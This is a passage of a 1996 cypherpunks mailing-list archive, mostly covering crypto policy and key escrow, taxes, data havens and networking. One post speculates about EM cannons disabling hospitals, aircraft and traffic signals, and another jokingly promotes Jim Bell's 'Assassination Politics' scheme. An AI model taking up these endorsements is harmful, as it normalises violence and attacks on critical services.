jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 14 Aug 1996 12:28:03 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Whoa there, speederpunks! WAS: Police prepair stunning end..
In-Reply-To: <199608131643.JAA19738@mail.pacifier.com>
Message-ID: <199608140140.SAA28926@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Whoa there, speederpunks!

I've let a couple of these messages go past me without comment, but I
think I'd like to throw in a couple cents on this one.

1) I'd like to assure y'all, as someone who has had a run in with a
   couple bad alternators, that loosing electrical power will not 
   cause you to go careening off the side of the road.

   Granted, you might be a in fix if your a nine year old kid running
   from the cops in a '64 volvo, or some other arian super-car, and the
   power steering went out. But if that were to ever happen, it would be
   because you ran over a few curbs at ludicrus speed -- not because
   Johnny Flatfoot hosed ya down with an EM cannon.

2) Someone was curious why they don't just throw some high voltage
   cables across road and wait for the fire works. Well, this is a
   no-brainer too. In order for that to work, you sorta have to get me
   to do two things 1) drive down your street and 2) drive over your
   wires. Assuming that I have a reson for not being caught, I might
   not be too cooperative at doing that either. And of course the last
   consideration is that the guy putting down the wires might not get
   out of the way fast enough -- y'all come down to texas and ask the
   armadillo's why thats a problem.

3) It is really pointless to bicker about this. To quote from a not so
   popular Mark Hamel flick, "Radio, kid. Faster then rubber." Use the
   force, luke.

4) I would think that y'all would be happy that someone is doing all
   the tough work of constructing these devices. I think we all know
   that the first space cadet to haul one of these things into Kabrini
   Park is gonna loose it. From there its just a matter of time until
   every speed racer has one of these "inventions" mounted on his car
   and junior is wanting to order one from the 'Amazing Devices' ad in
   the back of Popular Science (in fact, I think you already can).

   From there, I think that a practical and portable EM cannon could
   become the HOT urban warfare weapon of the next decade. Bonnie and
   Clyde are going to look like amateurs when any rank and file with a
   mortage can buzz the bank and take them off-line for a day. Not to
   mention what you could do to a hospital, police station, air plane,
   traffic signal, grocery store, U-FO, and anything else that uses 1s 
   and 0s. All safely and anonymously I might add -- a concealed EM 
   cannon isn't gonna draw any attention, even when you fire it.

Thats my two cents,
Bye y'all.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pronto Secure Beta Feedback <secure@commtouch.com>
Date: Wed, 14 Aug 1996 10:11:44 +0800
To: cypherpunks@toad.com
Subject: Replace Key
Message-ID: <199608132251.SAA00435@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Type Bits/KeyID    Date       User ID
pub  1024/998463CD 1996/04/01 Pronto Secure Beta <secure@commtouch.com>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzFf7jAAAAEEAMI8wSoVVRRv0Sr68myImRaQH9N/uvZ2agoJHgxk70NYkQhp
BD72rz/7lO4HK51pe/9kTTFsZPAUoTG+xdWAgSrclG1auTjHQPnb/9m/H4SYKi4n
hcNDrq3HmbaHYZjsJGAUHdWV7Kj82z1ad39nCS2yjuh396RcpSbCxfqZhGPNAAUR
tClQcm9udG8gU2VjdXJlIEJldGEgPHNlY3VyZUBjb21tdG91Y2guY29tPokAlQMF
EDFgONAmwsX6mYRjzQEB7M8D/0yjy/7i6ICm9Qa6ff8skvnZdKrPJYqgnOg14Nx5
2DKGbSAbwnvq94UaQ0tCqsQNrKRO0pWOnBIOT++3oibKl39tTi/uQV4vtSPvSvia
xUp4emtY/hhhls7Nbv0TcHPysjT8cp4vtRk7zpFbCsNIKIk7tAWF3U7OSEc/sLCg
ixxW
=Ovh1
- -----END PGP PUBLIC KEY BLOCK-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMhEG2SoZzwIn1bdtAQG3xQF/Vlb4Cy/l1JVTHBiMZ0AWl+TuhjjjRRFz
T3mDP76QBCPrmftAA68a1krz0wOl6Dh6
=1HZk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Aug 1996 12:35:32 +0800
To: cypherpunks@toad.com
Subject: Re: India, Productivity, and Tropical Climes
Message-ID: <ae36805704021004eebb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:31 PM 8/13/96, Arun Mehta wrote:
>At 13:15 11/08/96 -0700, Timothy C. May wrote:

>Sorry, the response took a while: George Fernandes, who was the
>industries minister at the time, is an acquaintance, so I thought
>I'd get the story from the horse's mouth.

Thanks for supplying more details. I'm not convinced, though, of all the
points. India still royally screwed itself, reputation-wise.


>>As attractive as this sounds, historically this has not happened. And as
>>many will tell you, the climate of the Bay Area in particular and
>>California in general is extremely benign and delightful. The average
>>winter temperature is only about 10C cooler than summer temperatures.
>
>Didn't Mark Twain say that the coldest winter he had ever
>experienced was a summer in San Francisco? I do agree, SF and
>environs are great: but US immigration laws being what they are,
>not everyone can move there -- some day, "routing around" might
>make those places more attractive which have the least
>restrictive immigration laws.

Here I feel compelled as a Loyal American to point out something that often
gets lost in the comments about America doesn't let enough immigrants in,
how it discriminates against immmigrants, etc. The thing to remember is
that virtually none of the countries which the most vocal critics are from
have anything approaching the U.S. policy about immigration!

Mexicans and U.S. critics of U.S. policy cite the "border problem."
However, Americans cannot work in Mexico except under extreme limitations.
Americans in Mexico cannot send their children to Mexican public schools.
And so on. This was described in "The Treasure of the Sierra Madre," where
two Americans are stranded in Mexico, unable by law to work. Things haven't
changed much.

And what about immigration to Japan? Or Hong Kong? Or Taiwan? Ask the boat
people still rotting in camps, or turned back to sea to sink. How about
immigration into Switzerland, or Sweden, or France?

I don't have any knowledge about the situation on immigrating to India--I
don't know too many Americans who have, except some friends of friends who
moved to Goa some years back.

Personally, I favor open borders--but no public schooling, no tax-funded
handouts, no welfare, no child support, no public hospitals, etc.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Wed, 14 Aug 1996 13:04:37 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Econopunks FAQ, Ver. 0.98
In-Reply-To: <2.2.32.19960813144043.00887ef8@panix.com>
Message-ID: <199608140212.TAA14564@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What is a Fair Price for a good or service?
> 
> There is no such thing as a Fair Price.  There are only the prices paid by
> willing buyers and sellers.  These are generally called market prices.  Many
> factors influence price including cost of production and product
> characteristics but the only determinants are the desire of market actors to
> complete transactions at given prices.  

A Fair Price could be construed as a price agreed upon by a willing buyer
and a willing seller WITHOUT outside interference.

The extra  $150 I have to spend to get a computer without MS Windows 95
on it so I can run Linux comes to mind ...

-- 
Checkered Daemon                              cdaemon@goblin.punk.net

Delirium:  There must be a word for it ... the thing that lets you know that
           TIME is happening.  IS there a word?
Sandman:   CHANGE.
Delirium:  Oh.  I was AFRAID of that.

(My other SIG is a large, famous company whose opinions are not necessarily
mine.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Wed, 14 Aug 1996 13:17:49 +0800
To: <cypherpunks@toad.com>
Subject: Anguilla...etc.
Message-ID: <199608140219.TAA14383@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


  While Tim may be right that nobility is lost when backing down to the
authorities, the fact is that this game has little to do with noble
purposes.  Check that, obvious noble purposes.  While most on this list
would agree that free flow of information is noble we have all seen that
this is otherwise with people in power.  As I stated in my last post, the
Swiss have maintained thier "haven" for many years by playing both sides. 
In accomodating everyone they avoid harassment.
   This way the Swiss maintain a good system and live to fight another day.
???????????????????????????????????????
Greg Kucharo
sophi@best.com
"People want chaos for about 5 minutes.  Then 
they want some money and a backrub."
                                -Bruce Sterling
???????????????????????????????????????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Aug 1996 13:40:14 +0800
To: cypherpunks@toad.com
Subject: Capital and Taxes
Message-ID: <ae36838e05021004b025@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 PM 8/13/96, Brad Dolan wrote:

>... and while I'm ranting...
>
>Can somebody explain why:
>
>1. Good jobs of the future are knowledge jobs which require little
>capital investment.
>
>and
>
>2. We need a capital gains tax cut to encourage capital investment to
>stimulate the growth of good jobs of the future.
>
>?

Sure, as an investor in some small companies and a high-risk startup, I'll
give some thoughts on what motivates _me_, and why a capital gains tax cut
would help the economy.

First of all, let's dispense with any confusion between "capital
investment" and anything related to "capital goods" or "capital equipment."
The two things are not at all the same.

Consider a business that needs (or claims/hopes/plans) $1M in initial seed
money to get rolling. Sure, some businesses get started with less, or with
nothing, and finance growth out of sales. But a million bucks is not at all
uncommon for a startup company that needs some work to be done before sales
get started.

Note that this million dollars has nothing to do with buying "capital
investment," in the sense I think you mean (and in the sense I think Bart
Croughs meant). It may all go to salaries for, say, 5 people for a year or
two, plus office expenses, some other expenses, etc. Maybe even $50K worth
of computers. This a "knowledge-intensive" company with very little needed
in capital equipment.

How is this money raised, and what calculations does a potential investor
make about the risks, rewards, returns on investment, etc.?

For one thing, the gains on such an investment over some time period
(typically 3-6 years) are _capital gains_. These are now taxed at a
marginal rate of 28% Federal plus whatever state and local taxes may apply,
Here in California, the effective total marginal tax rate is 38-40%,
depending on some factors. (In several industrialized countries the capital
gains tax rate is zero, or nearly zero.)

But this 38% rate doesn't even tell the whole story. Suppose that I want to
make a $100K investment in this company my friends are trying to start.
Money has a cost, both in the "rent" that is charged on it, or the "rent"
that _could have_ been charged to another for an alternate use, and on
something else that's terribly important: taxes must be paid on other
assets sold to raise the $100K. For example, if I own shares in Intel,
bought many years ago, I have to sell $160,000 worth of Intel stock, send a
$60,000 check to Uncle Sam and Uncle Pete, and then send the remaining
$100,000 to my friends. If the new investment *doubles*, my $100,000 gain
is taxed at 38% and I'm left with a gain of about $62,000.

It doesn't take a number theorist to see that I may as well have not even
bothered. So long as I just sit on the Intel stock, no taxes are owed.
Sounds like a no brainer to me.

Yes, taxes will _someday_ have to be paid...but many of us are hoping,
praying, and pleading for a cut in the capital gains tax rate...at least a
rollback to the 22% rate of yesteryear (and 4% or less in states). This
huge "backlog" of unrealized capital gains (aka gains on paper, but not yet
taxable) is what is being spoken of when people like Jack Kemp and Steve
Forbes speak of "unleashing" the capital gains now tied up due to the high
tax rates.

(Letting capital flow more easily will also make for a more efficient
market. It may be that I would've liquidated much of my Intel holdings had
the tax penalty not been so high.)

There are many more things I could say, but this is already too long. Just
don't think in terms of "capital" as just being "capital equipment." It is
really "investment" in all its many forms.

"Free the capital--and I don't mean D.C."

--Tim May, author of "DOS Capital"

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 14 Aug 1996 11:18:40 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: photographed license plates
In-Reply-To: <199608130335.UAA03631@dfw-ix9.ix.netcom.com>
Message-ID: <199608132339.TAA01485@nrk.com>
MIME-Version: 1.0
Content-Type: text


I note those plastic cover for plates "to keep them clean"
seem to be more & more popular.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <gt4436c@prism.gatech.edu>
Date: Wed, 14 Aug 1996 10:48:54 +0800
To: combee@sso-austin.sps.mot.com (Ben Combee)
Subject: Re: [NOISE] Geek Apartments
Message-ID: <2.2.32.19960813234024.00c5ebcc@glc20.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 AM 8/13/96 -0500, you wrote:
>* I can see it now. Apartments full of geeks because the apartments 
>* were originally built with 100BaseX to each place and a T3 in the 
>* basement going direct to the local ISP.
>
>Yes, it has already happened, although in a slightly different
>context.  The Georgia Tech campus dormatories got wired with Ethernet
>back in 1994, and there was quite a rush by the sizable geek
>population to get dorm rooms in the buildings slated to get
>installation first.  It worked out quite well, especially the privacy
>aspects, as the dorm routers encrypted all packets so only the
>intended Ethernet node could receive it (at least that is what they
>said).  
>
>So, in this case it was only 10BaseT and gatech.edu as the ISP, but it
>still was very neat.

Thanks to the Olympics, Georgia Tech now has 100% Ethernet availability
in its dormitories.  Currently the system utilizes a fiber-optic campus backbone
with network hardware in each building providing a 10BaseT port to each
student.  Work is underway to install ATM hardware and upgrade ports to
100Mb/s networking technology.
  Jeremy L. Mineweaser   | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
gt4436c@prism.gatech.edu | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y- 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Aug 1996 13:51:50 +0800
To: cypherpunks@toad.com
Subject: Political Burnout
Message-ID: <199608140257.TAA28772@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


To those of you who are tired of the Republican National Convention.  And 
particularly to those who are ALREADY tired of the Democrat National 
Convention, despite the fact that it hasn't started yet.

Remember those irritating signs beside the road, advertising some new 
apartment complex or housing development that you pass on the way home?  You 
know, the ones which say, "If you lived here, you'd be home by now."

Well, as you watch these conventions (conventia?), imagine a sign on the 
Information Superhighway, just up ahead.  It says:

"If your country were operated under the principles of 'Assassination 
Politics', not only would this convention be over by now, it wouldn't have 
even started!"

We return you to your regularly scheduled farce.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brett Killins <bakillin@iAmerica.net>
Date: Wed, 14 Aug 1996 12:18:04 +0800
To: cypherpunks@toad.com
Subject: addenendum
Message-ID: <321143D0.7115@iamerica.net>
MIME-Version: 1.0
Content-Type: text/plain


The link on 
http://www.gatech.edu/lcc/idt/Miscellaneous/Glass_Houses/Organizations/Cypherpunks.html
that points to the hotwired article on the cypherpunks has changed from
http://www.hotwired.com/wired/1.2/features/cryptorebels.html   to
http://www.hotwired.com/wired/1.2/features/crypto.rebels.html.  Or 
perhaps a typo?  You may also want to include a link to 
http://www.hotwired.com/wired/1.2/features/crypto.rebels.sidebars.html

Brett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 14 Aug 1996 12:19:06 +0800
To: cypherpunks@toad.com
Subject: key escrow idea from David Satelin of MIT Lincoln Labs
Message-ID: <199608140019.UAA04803@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


My comments included below Rivest's message.
-matt

------- Forwarded Message

Received: from amontillado.research.att.com (amontillado.research.att.com [135.104.21.154]) by nsa.research.att.com (8.7.3/8.7.3) with ESMTP id QAA04438 for <mab-local@nsa.research.att.com>; Tue, 13 Aug 1996 16:17:05 -0400 (EDT)
Received: from research.research.att.com (research.att.com [135.104.117.5]) by amontillado.research.att.com (8.7.5/8.7) with SMTP id QAA24830 for <mab@issr.research.att.com>; Tue, 13 Aug 1996 16:20:09 -0400 (EDT)
Received: from theory.lcs.mit.edu by research; Tue Aug 13 16:17:17 EDT 1996
Received: from swan.lcs.mit.edu by theory.lcs.mit.edu (5.65c/TOC-1.2S) 
	id AA05040; Tue, 13 Aug 96 16:16:20 EDT
From: rivest@theory.lcs.mit.edu (Ron Rivest)
Received: by swan.lcs.mit.edu (5.65c/TOC-1.2C) 
	id AA00335; Tue, 13 Aug 96 16:16:20 EDT
Date: Tue, 13 Aug 96 16:16:20 EDT
Message-Id: <199608132016.AA00335@swan.lcs.mit.edu>
To: jim@rsa.com, gnu@toad.com, whitfield.diffie@eng.sun.com,
        mab@research.att.com, denning@cs.georgetown.edu
Cc: staelin@ll.mit.edu, mld@hq.lcs.mit.edu
Subject: Crypto Policy Variant


Hi --

Here is another MIT professor's (Dave Staelin's) suggestion for a
national crypto policy.  I thought you might be interested in seeing
it; given the difficulty of the debate, any variant, even if only
slightly different from previous ones, should be considered.  Feel
free to pass this note around, or to post it...

Here is Staelin's idea:
	(1) You can use any crypto you want, but you must keep a record
	    of the crypto keys you used.
	(2) The government can ask for the crypto keys later, if they have
	    a court order, just as they can ask for any of your other papers
	    or documents.  You must give the key(s) to them, just as you
            must turn over your private papers in such a situation.
            (There would have to be an appropriate penalty for losing the
            key...)

The attractive feature of this proposal is that it puts encrypted
communications in the same category as private papers; the government
is required to give notice to (at least one of) the affected
individual(s) _before_ the search can be undertaken.  This cures what is
in my mind a defect in the current wire-tapping laws.  

DISCUSSION

In a variant of Staelin's proposal (my twist) you could append to each
encrypted message an encrypted form of the message key.  The
encryption could be with the public-key of a trusted third party who
will not (and legally may not) reveal the message key without
notifying you first (or ensuring that you have been appropriately
served with the corresponding warrant).  For example, the ACLU might
be such a TTP.  This protects the government's right to access and
protects the individual from the penalties (or benefits) of losing the
key.  This procedure is technically simple; what is more complex is
ensuring that the TTP's are appropriately registered and protected
from undue government influence.  The use of such a TTP would in any
case be optional; the communicants need not use a TTP if they
understand their obligation to keep the crypto keys around for some
period of time afterwards.  

In Staelin's proposal government gains access to the communications,
but does not gain "real-time access" as desired by the FBI.  This loss
may be tolerable, given the benefit obtained (forcing access to be
made in accordance with the Constitutional requirements for
notification before search).  The use of wiretapping encrypted
communications as a preventive measure might be severely limited, but
its use as a means of gathering evidence to force a conviction would
be preserved.

For international communications, each communicant might be required to
use a TTP that is bound to honor the laws of his country (which TTP to be
used should be the choice of the communicant).  

It may be seem a bit strange to force individuals to keep around
information (keys) that they no longer really need.  However, this is
more-or-less the case for financial records right now.



CONCLUSION

The fundamental idea is to give the government a right to access
encrypted communication in return for a guarantee that access may not
be obtained until there is BOTH proper legal authorization AND proper
prior notice to (at least one of) the communicants.

Is this workable??


------- End of Forwarded Message

[Matt's comments follow]

The requirement to store your keys for some period of time would,
I think, be very unusal, legaly.

As far as I know there are virtually no records that an ordinary
individual is required to keep today under criminal penalty of law.
One has to keep tax records if one expects to be able to document
deductions if audited, but for people without deductions, no records
need be kept (and even those who do but who destroy their records
risk having their deductions disallowed, but face criminal penalties
only if the govenment can prove you intended fraud.  Not having
records does not by itself constitute fraud, as far as I know).

According to the original message:
	The attractive feature of this proposal is that it puts
	encrypted communications in the same category as private
	papers; the government is required to give notice to (at
	least one of) the affected individual(s) _before_ the search
	can be undertaken.  This cures what is in my mind a defect
	in the current wire-tapping laws.

Yes and no.  True, it makes it impossible to recover communication
without the knowledge of one party.  But it still goes well beyond
the  norms for private papers.  The vast majority of private papers
are, according to the law, just that - private.  One is under no
obligation to maintain "private papers" in any particular manner
or for any period of time.   Only very limited types of private
papers (none for most people) have to be maintained at all.  While,
in general, the government can get a court order to force one to
turn over documents that exist, one is not obligated to keep
documents that are otherwise of no use in order to be ready should
a court order happen sometime in the future.  One can burn one's
old love letters any time one feels like it.

But enough philosophy.  There are technical reasons to consider
this proposal a bad idea.

The main technical problem with the Staelin proposal is the
requirement that the user maintain a large store of no longer useful
but highly sensitive data in a secure manner for a period of time.
This introduces an obvious storage burden (how does an encrypting
phone or network connection store old keys?) that would make many
kinds of otherwise simple encryption hardware and software far more
complex and difficult to design and expensive to implement and
operate.  Consider a secure phone (like the TSD 3600 or STU III).
A critical design feature of these devices is that they never have
to emit secret keys outside their internal security boundaries.
Consider, too, software that runs on PCs and workstations.
Ordinarily, software that establishes, say, a secure Internet
connection has no need to store any secret associated with the
session anywhere.  And that's a good thing - the file systems on
most computers aren't secure enough to store keys, so including
the key storage feature required by the Staelin scheme would entail
implementing some kind of secure storage system that isn't otherwise
needed by the application.  Even if the design complexity is solved,
there is the problem of maintaining the stored keys in a secure
manner, introducing what would in most cases be a more serious
security vulnerability than any other aspect of the application
(since the keys would continue to exist long after the secure
session has ended).   Under the Staelin proposal, the design,
implementation, and use of encryption software and hardware becomes
much more complex, so complex that I honestly don't think we know
how to do it.  I touch on these points in discussing key escrow in
general in my Senate testimony,
ftp://research.att.com/dist/mab/testiomny.txt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 14 Aug 1996 12:06:05 +0800
To: Ben Combee <combee@sso-austin.sps.mot.com>
Subject: Re: [NOISE] Geek Apartments
In-Reply-To: <9608131541.AA26416@sso-austin.sps.mot.com>
Message-ID: <Pine.BSF.3.91.960813201707.29349A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 13 Aug 1996, Ben Combee wrote:

> installation first.  It worked out quite well, especially the privacy
> aspects, as the dorm routers encrypted all packets so only the
> intended Ethernet node could receive it (at least that is what they
> said).  

I'm not familiar with the GA Tech network, but they probably didn't
"encrypt at the router."  They most likely used concentrators which would
send a the original packet only to the concentrator port registered for
the MAC (layer 2) address involved, and sent a packet with the payload
overwritten with "junk" out the other ports, to comply with ethernet rules
whereby all devices "see" the packet. Not encryption at all, but it does
defeat sniffing (on the local segment only) if configured in this manner. 

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Wed, 14 Aug 1996 14:36:39 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: photographed license plates
In-Reply-To: <v02140b00ae36c4403679@[204.179.128.40]>
Message-ID: <v03007802ae36fdc0b789@[17.219.103.200]>
MIME-Version: 1.0
Content-Type: text/plain


Regarding photographing cars for speeding, mccoy@communities.com (Jim McCoy)
notes that a drive could challenge a photo ticket by stating that

>"it was not me driving when that photo was taken"

When this was tried in (I believe) Sweden, the driver was told that
the ticked would be canceled.

Then, he was told that henceforth, he would be *required* to maintain
a log of precisely who was driving, the date, time, and the beginning and
ending odomoter. Required, that is, as a condition of keeping his license.
And that he must produce this log whenever a police officer requested it.

Amazing how this improved the driver's memory.

There is another problem that these tickets could cause. (This could
be an urban legend, of course): a former work collegue was speeding
in Switzerland. His wife opened the letter with the ticket -- and
photograph. The passenger was not his wife, and the location differed
from where my former collegue's wife expected her (soon to be former)
husband to be.

Drive carefully.

Martin Minow
minow@apple.com










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Aug 1996 14:49:09 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla...etc.
Message-ID: <ae369cb70602100499a1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:21 AM 8/14/96, Greg Kucharo wrote:
>  While Tim may be right that nobility is lost when backing down to the
>authorities, the fact is that this game has little to do with noble
>purposes.  Check that, obvious noble purposes.  While most on this list
>would agree that free flow of information is noble we have all seen that
>this is otherwise with people in power.  As I stated in my last post, the
>Swiss have maintained thier "haven" for many years by playing both sides.
>In accomodating everyone they avoid harassment.
>   This way the Swiss maintain a good system and live to fight another day.

Let me be clear that I am not talking about "noble motives." In the sense
of somone sacrificing himself for the good of the herd, blah blah.

Rather, there is an "archetype," if you will, of what a "remailer" is, what
a "data haven" is, what a "tax shelter" is, etc. While we cannot reasonably
expect a remailer to exactly match the archetype, we can point out obvious
deficiencies.

For "data havens," we have very few examples, compared to operational
remailers. We have the fictional form in Bruce Sterling's "Islands in the
Net," some of whose plot twists have some parallels to the current Anguilla
situation. Another is the form described in Ross Anderson's "Eternity
Service."

What might we expect of a true data haven? I've tried to describe several
of the attributes in my earlier posts, mainly by asking questions about
specific examples (bomb-building instructions, "Kill the monarchy" screeds,
etc.).

Interestingly, with several of these examples, Vince has said that he is
not interested in having this kind of material on his site. His invitation
for Multi-Level Marketers to avoid U.S. and other laws by locating on his
service has now been withdrawn, from his latest comments. (To the person
who sent me mail explaining that MLM schemes are not illegal in the U.S.,
indeed, some are legal and some are not. I said as much. And for those
which are legal in the U.S. or France or wherever, they would hardly have
any need to use Vince's service, would they? I surmised from his invitation
that he was encouraging MLM/pyramid scheme operators to avoid their
parochial fraud laws and use the services in Anguilla.)

I plan to do more looking at just who is left, who is using Offshore
Information and what kinds of services they are offering. Not to harass
Vince, of course, but to better look at the envelope of what is considered
OK and what is not.

If i find that all the "juicy" stuff is gone and all that is left is
booking sailing cruises around the Carribbean, I'll hardly call it a "data
haven." Which is not to say it's not still a useful and profitable business
for Vince, just that it has no Cypherpunk relevance.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 14 Aug 1996 11:58:32 +0800
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <9608131856.AA05229@spirit.aud.alcatel.com>
Message-ID: <Pine.SV4.3.91.960813210636.24684M-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Aug 1996, Daniel R. Oelke wrote:

> If foil or metal mesh would block it, then many recently built houses
> would be already set.  Usually that 1/2 - 1 inch styrofoam used 
> on almost all exterior walls has a reflective layer of foil to help
> keep the heat/cold out.


  Take a course in Tempest practices.  Casual residential practice 
implemented by construction workers do not a vault make.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 14 Aug 1996 12:28:51 +0800
To: cypherpunks@toad.com
Subject: resend: key escrow idea from David Staelin of MIT Lincoln Labs
Message-ID: <199608140124.VAA04963@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


My first send of this message was garbled and truncated.  Here it is again.
Sorry.

My comments included below Rivest's message.
-matt

------- Forwarded Message

Received: from amontillado.research.att.com (amontillado.research.att.com [135.104.21.154]) by nsa.research.att.com (8.7.3/8.7.3) with ESMTP id QAA04438 for <mab-local@nsa.research.att.com>; Tue, 13 Aug 1996 16:17:05 -0400 (EDT)
Received: from research.research.att.com (research.att.com [135.104.117.5]) by amontillado.research.att.com (8.7.5/8.7) with SMTP id QAA24830 for <mab@issr.research.att.com>; Tue, 13 Aug 1996 16:20:09 -0400 (EDT)
Received: from theory.lcs.mit.edu by research; Tue Aug 13 16:17:17 EDT 1996
Received: from swan.lcs.mit.edu by theory.lcs.mit.edu (5.65c/TOC-1.2S) 
	id AA05040; Tue, 13 Aug 96 16:16:20 EDT
From: rivest@theory.lcs.mit.edu (Ron Rivest)
Received: by swan.lcs.mit.edu (5.65c/TOC-1.2C) 
	id AA00335; Tue, 13 Aug 96 16:16:20 EDT
Date: Tue, 13 Aug 96 16:16:20 EDT
Message-Id: <199608132016.AA00335@swan.lcs.mit.edu>
To: jim@rsa.com, gnu@toad.com, whitfield.diffie@eng.sun.com,
        mab@research.att.com, denning@cs.georgetown.edu
Cc: staelin@ll.mit.edu, mld@hq.lcs.mit.edu
Subject: Crypto Policy Variant


Hi --

Here is another MIT professor's (Dave Staelin's) suggestion for a
national crypto policy.  I thought you might be interested in seeing
it; given the difficulty of the debate, any variant, even if only
slightly different from previous ones, should be considered.  Feel
free to pass this note around, or to post it...

Here is Staelin's idea:
	(1) You can use any crypto you want, but you must keep a record
	    of the crypto keys you used.
	(2) The government can ask for the crypto keys later, if they have
	    a court order, just as they can ask for any of your other papers
	    or documents.  You must give the key(s) to them, just as you
            must turn over your private papers in such a situation.
            (There would have to be an appropriate penalty for losing the
            key...)

The attractive feature of this proposal is that it puts encrypted
communications in the same category as private papers; the government
is required to give notice to (at least one of) the affected
individual(s) _before_ the search can be undertaken.  This cures what is
in my mind a defect in the current wire-tapping laws.  

DISCUSSION

In a variant of Staelin's proposal (my twist) you could append to each
encrypted message an encrypted form of the message key.  The
encryption could be with the public-key of a trusted third party who
will not (and legally may not) reveal the message key without
notifying you first (or ensuring that you have been appropriately
served with the corresponding warrant).  For example, the ACLU might
be such a TTP.  This protects the government's right to access and
